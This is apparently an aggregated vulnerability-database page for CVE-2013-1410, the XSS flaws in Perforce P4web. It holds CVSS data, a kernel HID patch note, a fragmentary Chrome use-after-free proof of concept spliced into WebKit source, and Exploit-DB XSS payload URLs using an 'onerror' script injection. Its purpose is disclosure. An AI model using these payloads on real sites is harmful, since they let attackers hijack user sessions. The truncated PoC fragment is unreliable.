CVE-2013-1410
published 2020-02-12
CVE-2013-1410: Perforce P4web 2011.1 and 2012.1 has multiple XSS vulnerabilities
Priority P433 · medium · 6.1 · CVSS 3.1
AV:N · AC:L · PR:N · UI:R · S:C · C:L · I:L · A:N
EXPLOIT
EPSS: 1.50% (71.1th percentile)
Perforce P4web 2011.1 and 2012.1 has multiple XSS vulnerabilities
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| perforce | p4web | — | — |
| perforce | p4web | — | — |
CVSS provenance
nvd · v3.1 · 6.1 MEDIUM · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvd · v2.0 · 4.3 MEDIUM · AV:N/AC:M/Au:N/C:N/I:P/A:N
GHSA
GHSA-g4q3-pw4q-377x: Perforce P4web 2011
ghsa_unreviewed·2022-05-05
CVE-2013-1410 [MEDIUM] GHSA-g4q3-pw4q-377x: Perforce P4web 2011
Perforce P4web 2011.1 and 2012.1 has multiple XSS vulnerabilities
Kernel
HID: steelseries: validate output report details
kernel_security·2013-09-11·CVSS 4.7
CVE-2013-2891 [MEDIUM] HID: steelseries: validate output report details
HID: steelseries: validate output report details
A HID device could send a malicious output report that would cause the
steelseries HID driver to write beyond the output report allocation
during initialization, causing a heap overflow:
[ 167.981534] usb 1-1: New USB device found, idVendor=1038, idProduct=1410
...
[ 182.050547] BUG kmalloc-256 (Tainted: G W ): Redzone overwritten
CVE-2013-2891
Signed-off-by: Kees Cook
Cc: [email protected]
Reviewed-by: Benjamin Tissoires
Signed-off-by: Jiri Kosina
No detection rules found.
Exploit-DB
Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use-After-Free (PoC)
exploitdb·2013-04-04
CVE-2013-2842 Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use-After-Free (PoC)
Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use-After-Free (PoC)
---
#---object-beforeload-chrome.html---#
function sprayOne(mem, size, v) {
var a = new Uint8ClampedArray(size - 20);
for (var j = 0; j
155 LayoutRect contentBoxRect() const { return LayoutRect(borderLeft() + paddingLeft(), borderTop() + paddingTop(), contentWidth(), contentHeight()); }
156 // The content box in absolute coords. Ignores transforms.
157 IntRect absoluteContentBox() const;
158 // The content box converted to absolute coords (taking transforms into account).
(lldb) reg read
General Purpose Registers:
ea
Exploit-DB
Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2013-01-22
CVE-2013-1410 Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities
Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/57514/info
Perforce P4Web is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Perforce P4Web versions 2011.1 and 2012.1 are vulnerable; other versions may also be affected.
http://www.example.com/u=Administrator&p=&c=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Submit=Log+In&orgurl=
http://www.example.com/cnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%2
No writeups or analysis indexed.
2020-02-12
Published